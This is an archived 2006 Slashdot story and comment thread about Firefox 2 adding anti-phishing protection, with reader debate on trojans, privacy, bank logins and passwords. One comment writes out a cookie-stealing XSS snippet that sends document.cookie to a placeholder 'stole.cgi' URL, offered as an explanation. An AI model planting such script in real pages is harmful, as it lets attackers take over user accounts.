Forgot your password?
typodupeerror

Firefox 2 To Have Anti-Phishing Technology 229

Posted by Zonk
from the i-like-to-catch-phish dept.
Mitchell Bronze writes "Mozilla's Mike Shaver said in an interview that the upcoming Firefox 2 will have anti-phishing capability using technology that might come from Google." From the article: "With the continued rise in online attacks, security tools have become something Web browser makers can use to try to stand out. Microsoft plans to include features to protect Web surfers against online scams in Internet Explorer 7, due later in 2006. Similar functionality is already in Netscape 8 and Opera 8, both released last year. 'It is another example of the energy that has returned to the browser market,' Shaver said."
This discussion has been archived. No new comments can be posted.

Firefox 2 To Have Anti-Phishing Technology

Comments Filter:
  • Good on ya (Score:2, Funny)

    by RyoShin (610051)
    Good idea. This way they can make sure that the only thing stolen through FireFox is memory space.

    [rimshot]
    • Re:Good on ya (Score:5, Interesting)

      by BecomingLumberg (949374) on Thursday March 09, 2006 @11:41AM (#14882922)
      Fox may be a memory hog, but I have not seen it to be out of line in most modern systems. Plus, I get really low useage when i turn off all the extensions i have added to it for customizing.

      And I cannot emphasize enough how great it is for my parents. By switching them to Fox and Bird, I have stopped my monthy trip up to remove all new spyware/viruses... now I just go for dinner. That gets an A+ in my book.

      • Re:Good on ya (Score:5, Insightful)

        by Tx (96709) on Thursday March 09, 2006 @12:07PM (#14883144) Journal
        Fox may be a memory hog, but I have not seen it to be out of line in most modern systems. Plus, I get really low useage when i turn off all the extensions i have added to it for customizing.

        Yeah well, the reply on the support forums to any memory problems is always "must be extensions at fault", and it's almost certainly true. The thing is, ask me to choose between Firefox without extensions and Opera, and there is no contest, Opera wins hands down.

        I think the Firefox team should be focussing on ways to ensure that extensions behave. They could do any number of things. Put together a team of people whose job it is to check extensions for obvious flaws, and make a list of "approved" extensions that pass muster. Improve the APIs used by extension developers. Work on tools to help extension developers write robust code. Seems to me more useful than some of the stuff they're working for. That's not to say they haven't done a great job so far, I just think that would be a useful thing to focus on at this point.
    • It's certainly a step in the right direction. Perhaps next they'll make Gecko render the Acid test. And then really push the boat out and actually make the lightweight browser lightweight on memory.
    • Re:Good on ya (Score:5, Informative)

      by thedbtree (935701) on Thursday March 09, 2006 @12:19PM (#14883254)
      I also have trouble with Firefox eating up 100-150-200MB after being open for a while. There is a fix to this problem, however. Some of the comments from an older Slashdot article, Firefox Memory Leak is a Feature [slashdot.org], will tell you how to fix it.

      If I remember correctly, it's something to do with cacheing the pages. Firefox caches something like 25 previous pages you've been to... on each tab.

      Maybe this isn't the actual problem -- I'm not a developer -- but it seems to have stopped the "memory leak" issue I have with Firefox 1.5+

      • Re:Good on ya (Score:3, Interesting)

        by Firehed (942385)
        Indeed... after *just* opening it, it's at 50MB, just a few kb under what explorer (shell, not browswer!) is using. I fixed the problem around Christmastime with my move to 2GB of ram. It's not overly problematic, just irritating.
    • Re:Good on ya (Score:2, Insightful)

      by CastrTroy (595695)
      open for 5 hours, constant browsing, currently using 55 MB. I don't know where everyone gets these problems. Maybe it's some extension. I've never seen Firefox go above 80 MB.
  • by Anonymous Coward on Thursday March 09, 2006 @11:30AM (#14882802)
    Microsoft plans to include features to protect Web surfers against online scams in Internet Explorer 7

    Site Blocked: www.google.com has been placed on a list of sites that link to potentially unsafe and / or phishing sites.
  • by Opportunist (166417) on Thursday March 09, 2006 @11:30AM (#14882807)
    The biggest problem is still the weakest link in the system: Its user.

    Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored. This starts with Mails that urge him to open something "really urgently", covers various plugins for Browsers that come filled with spyware (which, in turn, is a perfect door for other malware) and goes to bogus files on various P2P networks that claim to be some crack, hack or other "goodie" to lure the P2P user into starting it.

    Now, you can walk the same way that antivirus companies go, you wait for the threat to unfold and grab it at its neck when you find it lurking in the system once your update covers it. That's fine as long as your releases at least match the speed of trojan development, if there is some intersection between the moment you update your anti-trojan signatures and the moment the trojan goes into a new generation.

    And that window is closing. Fast. We're now facing trojans with update cycles that make you wonder when and how they create them. Currently, you face about weekly updates of some trojans. For the simple reason that there is no reason to update them more often. It is technically no problem to have them update twice a day. That's already a rate that no antivirus company could match. The AV company first of all needs to get a hold of the trojan, develop reliable signatures, create an update for the sigs and send them towards you.

    Currently, AV companies can keep up with development. The trojan writers have enough clueless people without any antivirus protection who click everything and anything and allow every program to do whatever it pleases on the web, so they don't care about "us", those who have av tools and/or know how to keep their computer clean.

    As soon as a browser like this hits the market, the race is on. It does no longer matter if you're clueless or an IT-pro, your browser will keep you out of way's harm on everything it knows. So, to be successful, the phishers have to be faster (or develop a new strategy, whichever is easier to do).

    I'm not sure if AV companies can win that game if it becomes one of update speeds. A trojan writer has to push one update for one trojan. The AV company has to push a few 100 for about as many malware programs. Not a good position for the AV guys.

    My hope is that Firefox will have a different approach to the problem. Self-checking processes (to avoid injections), close scrutiny of its BHOs, etc. I hope they will not try to use AV techniques, but instead concentrate on the entry points for such a program, and try to detect it there.
    • The biggest problem is still the weakest link in the system: Its user.

      Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored.

      So which one is it? "The linkest weak is the user" or "vulnerabilities aside, the weakest link is the user"

      I would suggest that its option B - "vulnerabilities aside, the weakest link is the user"

      I would say that Slammer / Blaster / Code Red / etc infected far more people in a far shorter period of time then any via-user link.

      In fact, I'
      • by TykeClone (668449) * <TykeClone@gmail.com> on Thursday March 09, 2006 @11:44AM (#14882940) Homepage Journal
        I would say that Slammer / Blaster / Code Red / etc infected far more people in a far shorter period of time then any via-user link.

        But each of those would have been avoided if the user either kept their machines patched or (at least) kept them behind a firewall.

        • I would say that Slammer / Blaster / Code Red / etc infected far more people in a far shorter period of time then any via-user link.

          But each of those would have been avoided if the user either kept their machines patched or (at least) kept them behind a firewall.

          What you say is correct - but failing to keep your machine patched & behind a firewall is not generally whats meant by a vulnerability requiring user intervention.

          When the grandparent talked about the user being the weak link in the chain, he

        • Also, Code Red/Slammer etc are wholly different from the phishing trojans discussed here. Those worms were spread without intervention by a user, but they didn't steal personal information. In the realm of info-stealing malware, the user is still the key weakness (be it through failure to read warnings before clicking Yes, or social engineering tricks to gain passwords)
      • I cannot sign that "in a non-window system the weakest link is the user".

        Windows is mostly so "insecure" because it pays to look for even the most obscure flaw in the system. That WMF exploit is a good example of a well hidden exploit. I know I'll get some flak from the anti-MS faction here for saying it, but Windows is not so much more insecure than Linux. It's just way more rewarding to spend time hunting some flaw hidden deeply in the system that requires you to jump through a million hoops in Windows.

        Es
    • by kandresen (712861) on Thursday March 09, 2006 @12:04PM (#14883122)
      My fear is similar, but not only that, most of the anti-spyware systems require external lookups which is a privacy risk. If we for every page we look at have to contact a 3rd party we are revealing our internal network structures as well as our use of internet. This is a gold mine for spammers, lawyers, and phishers among others...

      One of the things I demand to use this system is the ability to limit how it is used, turn it off, switch it for an alternative system, or uninstall it. The best way it can be implemented is as an pre-installed plugin, making it easy to maintain for those who need need alternatives.

      Firefox was always intended to be plugin based, so I hope they stick to that.
      • by Opportunist (166417) on Thursday March 09, 2006 @12:57PM (#14883578)
        The plugin system is also one of the ways to get a man in the middle phishing attack working.

        This aside, I agree that it should be possible to turn it off. Even though this would essentially kill the security of the system, but I'm firmly against handing over responsibility over my system to someone else, who I'd have to trust implicitly. And what if I don't?

        But I'd also recommend delivering it with a default ON setting on the security features. Just to make sure that all those who have no clue what's going on in their computer have it ON!
    • by 99BottlesOfBeerInMyF (813746) on Thursday March 09, 2006 @12:23PM (#14883293)

      The biggest problem is still the weakest link in the system: Its user.

      I very strongly disagree. There are currently many weaker links.

      Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored...

      Either I'm misunderstanding your statement or you are misinformed. Most infections do not currently involve human interaction measured both by number and bandwidth consumed.

      Currently, you face about weekly updates of some trojans. For the simple reason that there is no reason to update them more often. It is technically no problem to have them update twice a day. That's already a rate that no antivirus company could match. The AV company first of all needs to get a hold of the trojan, develop reliable signatures, create an update for the sigs and send them towards you.

      Actually, there are also self-mutating trojans that have been demonstrated that are very good at hiding and there are trojans that interfere with anti-virus.

      Currently, AV companies can keep up with development. The trojan writers have enough clueless people without any antivirus protection who click everything and anything and allow every program to do whatever it pleases on the web, so they don't care about "us", those who have av tools and/or know how to keep their computer clean.

      First, AV companies are not keeping up and we have seen several "zero-day" infections. More advanced intrusion detection software is becoming more and more responsible for finding new worms, viruses, and trojans on end users systems, a significant amount of time in advance of AV signatures. These systems are not only finding them, but creating and sharing signatures among major ISPs.

      Second, your depiction of the average user as people who "click everything and anything and allow every program to do whatever it pleases" is very misleading. I know security experts who have been duped by a well crafted trojan or phishing e-mail and the truth of the matter is, users are making poor choices based upon the fact that they are given poor options. Right now the average user is given the option of "open this file if it is a file or run it if it is a program and let it do anything it wants" or "don't open this file or program." Since users want to view data and install software, eventually they are bound to make the wrong choice.

      It will not be until users are given more control, information, and granularity by their tools that they will be given the option of being the weakest link. UI's need to let them know what is data and what is an executable. OS's need to run executables in sandboxes by default and only allow programs to do unusual things (log other program's keystrokes, modify the OS, access hardware directly, modify user files, connect to the internet, access the e-mail address book, access the buddy list, start a new service, modify other programs, etc.) after the user is informed in plain English and given a choice using a properly constructed UI. At this point, users will become the weakest link and not before.

      As soon as a browser like this hits the market, the race is on. It does no longer matter if you're clueless or an IT-pro, your browser will keep you out of way's harm on everything it knows. So, to be successful, the phishers have to be faster (or develop a new strategy, whichever is easier to do).

      First, the Web is only one vector and not even the most common vector for infection. Second, blacklists will never be able to keep up, although they will help.

      I'm not sure if AV companies can win that game if it becomes one of update speeds. A trojan writer has to push one update for one trojan. The AV company has to push a few 100 for about as many malware programs. Not a good position for the AV guys.

      Newer intrusion detection systems are they key to mitigating this. Propagation is detectable and if you have a relational model of your network abnormal activity can be flagged, detected

      • Some very valid points, and a very interesting point of view.

        It is indeed a problem that the user can only execute it or not. Then again, how many users do you see that could make a sensible decision given the information what a given program does? Worse, what if he is tricked by the program into allowing it?

        Let's imagine a scenario. You're a Joe Average user. You get a mail, supposedly from your bank, telling you that they were attacked and send you this way a tool to make sure you're out of harm's way. Yo
        • As soon as the user believes what the mail tells him, he will do ANYTHING you tell him. He will grant you any permit you want, actually telling him what kind of security warnings he'll get even increases your credibility. Because, well, would an attacker tell him that?

          This is not true in many cases. For example, if someone can successfully trick a user into thinking an executable is from their bank, they may still become suspicious when the program tries to do certain things. These things might include r

    • The biggest problem is still the weakest link in the system: Its user.

      I 100% agree.

      But who are the users? Joe Sixpack (I miss that guy around here :) Or are the banks and online retailers users also?

      I believe that everybody that uses the system is a user, and that the online banks and retailers are more responsible for securing the data than the "end user". Otherwise, why not just pay cash and keep our money under our mattresses? What service are the banks and online retailers providing for the average
      • Online banking is secure. At the bank's end, at least. I've never ever heard of a successful attack on online banking where the bank was the one who had a spy in its back seat.

        The problem with online banking is that you have to trust an untrustworthy client: The one on the user's side. You have no control at all over his machine. Banks don't even know who they're talking to, the trojan or to the user? And they have no way of knowing.

        Especially when dealing with man in the middle attacks (the ones going 'rou
        • How do you verify the identity of someone when they are potentially using a tool that's been laced with an identity stealing program?

          Keys and tokens. The bank gives me ID cards when I go and do business at the teller window, many have pictures embedded in them now, but they check nothing besides a minimum of 4 character ascii string when I do online banking.

          They also have cameras at banks, they have a finite storefront, compared to the internet where its almost infinite as to who or what script can "go to
          • Keys and tokens are nice, but you have to realize that the trojan dictates which info goes from bank to user and from user to bank. It can block, forge or manipulate anything supposed to go from either end to the other.

            In other words, whatever keys you have, the trojan does as well. At some point, it HAS to go into the computer, and that's when the trojan gets access to it.

            Banks ARE secure. The point of attack is the user's PC.
  • by ursabear (818651) on Thursday March 09, 2006 @11:31AM (#14882817) Homepage Journal
    I do hope this works well for the average Jane or Joe... I'd like to see less incedences where my mom forwards mails to me (thinking she's either been doing something wrong {like, her bank account is overdrafted, please go to this special web page and fix it}, or has gotten something great for free).

  • by potluckman (123280) on Thursday March 09, 2006 @11:31AM (#14882822)
    I'm a big fan of the Fox, but is this really a feature that should be built-in to our svelte (but extensible) browser?

    Seems like something that could be its own extension, or if Google is really so involved, integrated into the Google Toolbar for Firefox.
    • by bcattwoo (737354) on Thursday March 09, 2006 @11:41AM (#14882915)
      I'm a big fan of the Fox, but is this really a feature that should be built-in to our svelte (but extensible) browser?

      Yes.

      The users most susceptible to phishing are also the ones least likely to seek out and install an extension ("what's that?") to prevent it.

      If more savvy users are concerned about bloat perhaps this protection could be optional with the default for it to be turned on.

    • by dyftm (880762) on Thursday March 09, 2006 @11:52AM (#14883006)
      Actually, the code they are using started off as an extension (Google Safe Browsing). But, they decided that the users that most need protecting are the ones that have no idea what an extension is.
      • Let's have some other basic IE features that are more lightweight (a few lines of code, by comparison) built in, then -- such as Clone Window [pikey.me.uk]. As optional features, of course, but it'd help people switching who aren't techy and don't understand why they've "lost" functionality.
    • by tpgp (48001) on Thursday March 09, 2006 @11:52AM (#14883009) Homepage
      I'm a big fan of the Fox, but is this really a feature that should be built-in to our svelte (but extensible) browser?

      TFA:
      While Firefox 2 will get a phishing shield, no decision has been made on how it will be incorporated in Firefox, Shaver said
      Seems like something that could be its own extension, or if Google is really so involved, integrated into the Google Toolbar for Firefox.

      TFA:
      "Google, like others who contribute to the project, has contributed code and expertise for us to experiment with," he said. "We haven't committed to a given approach, a given technology or a given partner."

      • Even better, from the bug report [mozilla.org] (copy and paste URL to location bar). This is Fritz Schneider [ucsd.edu], a Google employee speaking:

        > Will google continue releasing the extension as part
        > of Google Labs, or a product offering?

        Great question. We're end-of-lifing the stand-alone extension as it is
        released on Labs. Instead, we've integrated this feature into the
        Google Toolbar for Firefox and it will go out in the next
        release. Then one of two things happens. Case one is this feature (or
        something like it) makes it

    • See here: http://www.google.com/tools/firefox/safebrowsing/ [google.com]

      It basically checks websites you visit against its database and tells you if they are considered dangerous or what have you.

      • It basically checks websites you visit against its database and tells you if they are considered dangerous or what have you.

        So it reports my surfing to google's database? Thanks but no thanks. I've never fallen pray to phishing attacks, and don't want a feature like that logging all the pr0n sites I visit. Wait, the only pr0n site I need is google images now anyway haha!

        Why should we trust google? They are looking out for their shareholder, not the end user.
        • Why should we trust google?

          If you honestly consider what websites you visit to be some kind of major secret, then by all means, don't use these sort of extensions.

          Me, I don't much care who knows what websites I go to. It's just not a major secret that I read slashdot and digg and a few other online forums and such.

          As for porn... dude, porn websites are so late 90's. Go retro with usenet! :D
    • It could be an extension, but if you're savvy enough to look for a phishing extension (or any kind of extension) then you're probably not going to click on a phishing link in the first place.

      An extension would protect people who don't need protection.

      A better solution is one that by default puts a warning over any dubious link and lets the user decide. If you're an expert user and the warning annoys you, you are in a position to disable it from the prefs. Everyone else can benefit from greater security

  • Smart move (Score:5, Interesting)

    by fak3r (917687) on Thursday March 09, 2006 @11:34AM (#14882848) Homepage
    With the scams changing so rapidly moving detection to a web browser just makes sense. When these things aren't tagged by the users email server (ClamAV is excellent for this) or client, this would be a great 'saftey net' from stopping me...err...grandma from entering her login info for PayPal/eBay/etc. Plus with FF online updating I could see them having a plugin/extention that would have .dat files with the latest Phishing definitions they could download and update to daily; ala virus checkers.
  • Already there (Score:5, Informative)

    by denisbergeron (197036) <(moc.oohay) (ta) (noregreBsineD)> on Thursday March 09, 2006 @11:37AM (#14882870)
    With Netcraft toolbar http://toolbar.netcraft.com/ [netcraft.com]
  • by digitaldc (879047) * on Thursday March 09, 2006 @11:37AM (#14882876)
    The various phishing shields use a variety of techniques to protect against the online scams. These include blacklists of known fraudulent Web sites, white lists of good sites and analyses of Web addresses and Web pages. Firefox 2 might be different, since the developers aren't married to those approaches, Shaver said.

    Verisign [verisignsecured.com] already has this kind of techology, the question is, will Firefox 2 make Verisign obsolete?

    Verisign's advice: [verisignsecured.com] The best way to avoid becoming a victim of phishing is to never respond to unsolicited emails asking for personal information or directing you to a Web site where you are asked to enter personal information--even if it looks TOTALLY official.
  • Click OK (Score:4, Funny)

    by DarkNemesis618 (908703) on Thursday March 09, 2006 @11:38AM (#14882880) Homepage
    Has Your Credit Card been stolen?
    Enter information and click OK to find out
    Name:_________________________________
    Billing Address:__________________________________
    Credit Card Type:________________
    Credit Card Number:_______________________________
    Expiration Date:___/___

    Now be an idiot and click OK to let me steal your info.

    • Re:Click OK (Score:3, Funny)

      by Ford Prefect (8777)
      Oh. This sounds really important!

      Name:_Ford_Prefect__________
      Billing Address:_72_Borchester_Road,_Ambridge,_Borchesters hire,_England___
      Credit Card Type:_VISA__________
      Credit Card Number:_4242-0563-1337-0584______
      Expiration Date:Mar/2008

      P.S.: I'm using Safari!
  • Privacy concerns? (Score:5, Interesting)

    by hcdejong (561314) <hobbes.xmsnet@nl> on Thursday March 09, 2006 @11:40AM (#14882903)
    Will Firefox adopt an approach that doesn't compromise the user's privacy as much as IE 7 (its solution being to send every URL to Redmond)?
  • That's an extreme stretch of the normal use of the term "technology". They thought of systematic way of warning people about phishing sites by compiling a list of them. Good for you. But computer programs, databases, and browsers have existed for a long time. This isn't a "new technology". It's a computer program. I know, you probably think it's a minor point, but keep in mind that Microsoft considers removing its own damn bugs to be "new technology" (NT).

    Thinking up ways to warn people about phishing
  • It's sad, really (Score:5, Insightful)

    by mwvdlee (775178) on Thursday March 09, 2006 @11:41AM (#14882913) Homepage
    It's sad, really, that the most important features regarding browsers nowadays all have to do with protecting the user against evil-doers.
  • by Psionicist (561330) on Thursday March 09, 2006 @11:44AM (#14882943)
    Seriously, what the FUCK? Googles anti-phising filter (as in google toolbar) is the one who is constantly sending your HTTP requests to Googles servers. There was a slashdot post about this a while ago, but I cannot find it.

    Unless you can disable this "feature" or it works completely differently, I'd consider Firefox 2 spyware.
    • by TrappedByMyself (861094) on Thursday March 09, 2006 @11:58AM (#14883060)
      You must have missed the giant full page disclaimer during install that describes what the Googlebar's page rank service does. You must also have missed the option on that page that lets you select whether or not you want that feature enabled.

      Google tells you exactly what the feature is, and throws the option to enable or disable it in your face, and yet you still whine about it.
    • Well... My first thought was "why don't they let you fetch a database instead of pushing your requests through their server"

      The problem with that, is that someday, someone may decrypt their anti-phishing database (because putting it in plain text would be monstrously stupid) and then overwrite it when some new FF exploit shows up.

      That's the only legitimate reason I thought of.

      Of course, if they're going to be sneaky about it, there's no reason malware writers couldn't just overwrite your hosts file to redir
      • Also, a malicious user could easily patch Firefox itself not to route requests through Google. The only reason Google is pushing this is to gather user data. They want to be able to track where people are visiting on the web so they can find new places to spider and to determine whether sites are legitimate or not. Whether you think that is evil is up to you, but it is definately a privacy issue.
    • When you first run IE7, you're asked whether you want to turn the phishing blocker on. If memory serves me correctly the default is "no." I expect that Firefox will follow IE7's lead here lest it be labeled as spyware.
    • Googles anti-phising filter (as in google toolbar) is the one who is constantly sending your HTTP requests to Googles servers. There was a slashdot post about this a while ago, but I cannot find it.

      Perhaps it's my comment [slashdot.org] you're referring to.
  • by g_adams27 (581237) on Thursday March 09, 2006 @11:47AM (#14882967)

    > Microsoft plans to include features to protect Web surfers
    > against online scams in Internet Explorer 7

    Wouldn't it have been easier just to not program the online scams into Internet Explorer 7 in the first place? I just don't understand Microsoft's new security procedures at all!

  • Damnit (Score:5, Interesting)

    by Anonymous Coward on Thursday March 09, 2006 @11:48AM (#14882974)
    Time for a fork.

    Seriously, I'll tell you the only anti-phishing technology we need: our damn heads, with a side of common sense.

    I don't want my browser to have stupid coddling features like this that will just get in the way of a decent, savvy surfer. That's the problem with popularity - it leads to diluting the quality. I'd rather have a *good* browser only used by 3% of the people out there. Hell, the mere minority status might even make it *better* - now that Firefox is popular, more and more sites are finding ways of advertising specifically to it.

    If Firefox 2 does have this, then it better be easy to fully disable, otherwise I'm definitely not upgrading.
    • Re:Damnit (Score:3, Insightful)

      by Senzei (791599)
      Welcome to sharing your toys with the world. Hopefully you can understand that not everyone is clued in, and that the people at mozilla or at least smart enough to know that not everyone needs a digital drool cloth.
    • Re:Damnit (Score:2, Interesting)

      by Spliffster (755587)
      not sure if this is also in seamonkey (aka the mozilla suite), i'd recommend to check this.
  • Good (Score:3, Interesting)

    by PenguinBoyDave (806137) <david.davidmeyer@org> on Thursday March 09, 2006 @11:49AM (#14882983)
    I have been forced to test IE 7 for my company, and the fact that Firefox 2 will have this will give us no reason to use IE 7.
  • by Eccles (932) on Thursday March 09, 2006 @11:53AM (#14883015) Journal
    Couldn't the browser also include cookie theft prevention? Recently I had an online game spoiled when a scripter stole my cookie and thus accessed my account, via user-modifiable code on the game's site. While I suppose some times cookie redirection might be legitimate, I'd think it rare enough that some sort of configurable blocker would handle those few cases while making cookies safer in others.
    • To what specifically are you referring when you say "cookie redirection"? It sounds to me more like the online game you were playing has an XSS security hole. In that case, there's no "cookie redirection" going on, it's you accessing your game account in a way the online game tells your browser to. The fact that the online game was tricked into doing so isn't something a browser can ascertain, because it's something that happens between the attacker and the game.

      • To what specifically are you referring when you say "cookie redirection"?

        When a user is able to add their own scripting on someone else's site. Sites like myspace and neopets, for example, allows users to add video, pics, etc. to their pages on a website. If they were able to add Javascript like:

        <a href="#" onclick="window.location='http://example.com/stole .cgi?text='+escape(document.cookie); return false;">Click here!</a>

        then they could snag your cookie and access your account. Make it onlo
        • From the browser's perspective, there's no "user" code and "website" code, it's all "website" code. So it becomes an issue of telling the difference between a website telling the browser to do something benign, and a website telling the browser to do something harmful. Can you think of a good way of differentiating between the two? That won't break things for legitimate users?

          Saying that "Ideally, the website should restrict..." is a huge understatement. Such websites are simply insecure, and should

  • by LeDopore (898286) on Thursday March 09, 2006 @11:53AM (#14883016) Homepage Journal
    Won't it be easier to defeat this anti-phishing scheme since Firefox is open source?

    (Seriously. If not, please post why not and educate me.)
    • Well, at least I believe that if they implement something like a "blacklist oneline database" there is no way to defeat it.

      It is something like with encryption, the fact that openSSH source code is available does not make the encryption algorithms less secure, it is the design of the algorithms what is secure.
    • by Haeleth (414428) on Thursday March 09, 2006 @12:29PM (#14883350) Journal
      Won't it be easier to defeat this anti-phishing scheme since Firefox is open source?
      (Seriously. If not, please post why not and educate me.)


      No, it won't, for the simple reason that obscurity does not provide security. Whether the source code is available or not, it's always possible for a smart hacker to figure out how a program works. So whenever you're doing anything related to security, you assume that the bad guy knows every last detail about your code does what it does. And you design your code so that that doesn't matter.

      For example, if you're blocking phishing attempts by having a database of known phishing sites (which is how the Netcraft toolbar works, IIRC), then it doesn't really help the phishers to know the details of exactly how your browser connects to the database and looks up their URL in it. Because even though they know what's happening, there isn't actually anything they can do to stop it happening.

      I suppose there are schemes that could be defeated by seeing the source. For example, a naive scheme that tried to identify phishing sites by running a fixed series of tests on them (check if site is in Russia but claims to be American bank, check URL to see if it contains dodgy characters, etc) would be slightly weaker in open source code because the tests would be visible for all to see. But such a scheme would be basically useless anyway - not because it's open source, but because it would be a fundamentally weak technique.
  • by scolby (838499) on Thursday March 09, 2006 @11:54AM (#14883026) Journal
    My bank, for example, recently introduced a feature called a site key for log ins to its online services. After entering your initial user id, it brings you to a screen that displays a user-chosen image and title. The rule is that if you recognize the image and the title, you enter your password. If you don't recognize one or both, you don't.
    Companies should be responsible for protecting their users, and this struck me as a rather good way of doing that. Granted, if someone really wanted to, they could set up a site just to scarf your user id, log in with that id to snag your site key, then create another site with the site key included to gank your password - but that's a lot of work.
    • Just makes it harder - is there anything stopping me from making a site that takes in your user ID, logs into the real site with that ID, pulls out the image and title, and shows it to you?

      The real answer. IMHO, is using public keys for authorisation, as you're then never sending anything that can be used again. Man in the middle attacks are still possible if you can persuade the user to accept the wrong server certificate, but it's as good as it gets, IMHO.

      The user's key doesn't even have to be signed - ju
    • I have the same bank and I fucking HATE sitekey.

      Why does it ask me to log in, then to - essentially - log in again?

      And bookmarks to the sitekey login page do not work.

      I use online banking way too much to tolerate such bullshit. I thought about switching banks to get away from sitekey!

      Almost as annoying as their autotimeout, which thankfully my friend wrote a greasemonkey script to nullify.

      They put so much effort into making their site secure and hard to phish that they made it a royal fucking pain in the a
  • by hackstraw (262471) * on Thursday March 09, 2006 @11:59AM (#14883068)

    When are people going to realize that passwords are not secure. Ever. Even if you pick a "good" password and change it every 13 minutes like a good boy, they are still not secure.

    Why? Its too easy to snag the password from social engineering or some other means or even by accident.

    I walked out of the bank disgusted when I went to get a private lock box, and it did not have a key given to me, and the bank had the other key like before. No, now they wanted me to remember a password, and enter it into a computer to unlock my box.

    OK. I made that up, because even banks are not stupid enough to do this, but they open up the account online to any bozo that has a password.

    My bank recently initiated an "anti-phishing" technology where it uses cookies stored on my computer and if the bank does not recognize my computer it displays a picture that I set up in the past with a caption that I selected for the picture, and then its supposed to be OK to put in my password now because the site is providing evidence that the bank and not some guy from China or Russia is asking for my password.

    However, I carry many bank cards in my wallet, and they work excellent at stores and ATMs, but they don't fit into any holes into my computer. The bank has already given me an excellent token that is much more difficult to replicate than a few random characters on a keyboard, but they refuse to use it.

    OK, I have to go and change my passwords now, its that time of year....

    • Interesting. I was about to reply and "correct" you, saying that American Express Blue already offers the protection of using your physical card as a second security factor. In fact, I even have the smart card reader that American Express was giving out for free (I wasn't even a cardholder). However, it seems they only offer this service in the middle east now. Link anyway, just for fun: American Express smart card reader [americanexpress.com.bh]
    • However, I carry many bank cards in my wallet, and they work excellent at stores and ATMs, but they don't fit into any holes into my computer. The bank has already given me an excellent token that is much more difficult to replicate than a few random characters on a keyboard, but they refuse to use it. I think you're missing the point. Your bank cards are just a magnetic stripe with a string of data on it (account number, exp date, and maybe some other misc info). A phishing site could just as easily ste
      • Really, the best method for fighting phishing is user education and global law enforcement.

        OK, remind me. Money has been around how long?

        Fighting "phishing", user education, and global law enforcement is very, very new and nonexistent at this time.

        I'm arguing that passwords are causal, and not correlational here.

        I've never been "phished" for the key to my house, nobody but someone I already trust to some degree deserves that, but when online banks _refuse_ to put their login page on a SSL secured site, an
    • No, now they wanted me to remember a password, and enter it into a computer to unlock my box.

      OK. I made that up, because even banks are not stupid enough to do this.

      Why would they? Did you miss the 5-10 surveilance cameras scanning the teller front line when you walked in?
  • Go to a site, get phished, find the jackasses behind it, round them up together, and beat them with a stick...
  • by Midnight Thunder (17205) on Thursday March 09, 2006 @12:34PM (#14883385) Homepage Journal
    Two things I would like to see:
      - colouring of URLs in the address bar, or something else, that would allow the novice user to easily identify the user name element of a URL. I have already see URLs of the form (http excluded): ://www.citibank.com@42426842fdsafadsfasd.com/fhiud sahiufds?sdafdsfsdf

      - even in a window that has no tool bar or status bar, there should always be an status bar that displays the page's address.
  • Here is a some design documentation for the safe browsing add-on: http://wiki.mozilla.org/Safe_Browsing:_Design_Docu mentation [mozilla.org]

    Here is the Bugzilla bug for turning on the feature. Remember that you have to copy and paste the link into the address bar because Bugzilla blocks slashdot. https://bugzilla.mozilla.org/show_bug.cgi?id=32929 2 [mozilla.org]

    From what I understand, the idea is to make the feature an extension that is installed by default, kind of like the talkback error reporting tool. In "normal mode", th

  • From my experience, phishing arrives at the user via SMTP (i.e. email). Isn't the SMTP client a better place for this technology? Alright, so nobody uses SMTP clients anymore, but it's a nice thought. Given the proliferation of web-hosted email sites, why isn't this filter technology provided to web email sites? Most web email providers, like hotmail, Yahoo, Gmail, and Netscape offer some level of spam filtering and anti-phishing protection.

    And speaking of anti-phishing, how about a program that flood

  • by DrXym (126579) on Thursday March 09, 2006 @01:06PM (#14883673)
    The need for anti-phishing in mozilla was identified 4 years ago. The problem was that it was raised as bugs in bugzilla and issues like that attract comments like flies to dogshit. I saw anti-phishing bugs with hundreds and hundreds of CCs and comments. No one could agree to anything and coded solutions were ignored for pointless debate. I hope this time around, they just implement SOMETHING. If it sucks, it's still better than nothing at all.

    Anyway, I'd argue that Thunderbird needs it much more than Firefox. Most phishing starts with the inbox. Links in email that use dodgy hex encoding, raw IPs, IPv6, point to domains that differ than the anchor text etc. should be highlighted. And popular targets such as banks, ebay, Paypal, Amazon etc. should be explicitly identified. I'd also like Thunderbird to add a phishing filter rule so that I can automatically toss the 20+ phishing emails I get a day straight in the junk folder without accidentally training the bayesian filter to kill genuine emails from Amazon, PayPal etc.

  • This is all you need [siteadvisor.com]:

    Verbatim from the site:

    About SiteAdvisor

    SiteAdvisor is a consumer software company founded in April 2005 by a group of MIT engineers who wanted to make the Web safer for their family and friends. Having spent one too many holiday breaks trying to clean a mess of spam, adware, and spyware from our families' computers, we decided to take action.

    We realized there was a gaping hole in existing Web security products. While traditional security companies had gotten relatively good at addressi

Nothing will ever be attempted if all possible objections must be first overcome. -- Dr. Johnson

Working...